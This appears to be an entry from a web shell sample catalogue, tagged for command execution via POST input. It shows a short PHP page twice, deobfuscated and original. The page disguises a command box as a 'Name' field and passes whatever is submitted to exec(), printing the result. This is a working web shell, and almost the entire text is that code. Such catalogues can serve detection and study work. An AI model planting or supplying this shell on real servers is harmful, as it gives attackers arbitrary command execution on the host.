Back to listTags
Executionexec
Input_POST
Deobfuscated code
<html>
<body>
<form method="post" action="<?php
echo $_SERVER['PHP_SELF'];
?>">
Name: <input type="text" name="fname">
<input type="submit">
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// collect value of input field
$command = $_POST['fname'];
if (empty($command)) {
echo "Name is empty";
} else {
$output = null;
$retval = null;
exec($command, $output, $retval);
print_r($output);
}
}
?>
</body>
</html>
Original code
<html>
<body>
<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
Name: <input type="text" name="fname">
<input type="submit">
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// collect value of input field
$command = $_POST['fname'];
if (empty($command)) {
echo "Name is empty";
} else {
$output=null;
$retval=null;
exec($command, $output, $retval);
print_r($output);
}
}
?>
</body>
</html>